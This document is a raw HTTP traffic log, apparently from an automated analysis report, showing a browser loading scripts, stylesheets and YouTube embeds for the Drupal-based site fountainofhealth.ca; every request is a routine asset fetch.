Source: global traffic HTTP traffic detected: GET /embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /modules/ajax_loader/js/ajax-throbber.js?v=1.x HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /modules/google_analytics/js/google_analytics.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/custom.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/script.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /embed/h15NcT6UXh0?si=YrXkudamh5IoggTR HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/thrivequestion.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/banner-slider.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/drupal.bootstrap.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/attributes.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/theme.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /modules/webform/js/webform.behaviors.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/states.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /s/player/59b252b9/www-player.css HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=X1ona4g8SHEcookie: VISITOR_INFO1_LIVE=KOw3SU8QT4Qcookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOw%3D%3Dcookie: __Secure-ROLLOUT_TOKEN=CKud1P3Cn6KvrAEQt4fm56y3jQMYt4fm56y3jQM%3Dpriority: u=0
Source: global traffic HTTP traffic detected: GET /s/player/59b252b9/player_ias.vflset/en_US/embed.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=xkpzWs-1UAwcookie: __Secure-ROLLOUT_TOKEN=CPOg5tKQz7TMJhCAkebnrLeNAxiAkebnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=exFbymtgdn0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXA%3D%3Dpriority: u=1
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/states.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /modules/webform/js/webform.states.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /s/player/59b252b9/www-embed-player.vflset/www-embed-player.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=xkpzWs-1UAwcookie: __Secure-ROLLOUT_TOKEN=CPOg5tKQz7TMJhCAkebnrLeNAxiAkebnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=exFbymtgdn0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXA%3D%3Dpriority: u=1
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/popover.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/tooltip.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/displace.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/jquery.tabbable.shim.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/position.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/modal.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/dialog.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /s/player/59b252b9/player_ias.vflset/en_US/base.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=xkpzWs-1UAwcookie: __Secure-ROLLOUT_TOKEN=CPOg5tKQz7TMJhCAkebnrLeNAxiAkebnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=exFbymtgdn0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXA%3D%3Dpriority: u=1
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/dialog/dialog.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/dialog/dialog.position.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/dialog/dialog.ajax.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/dialog.ajax.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
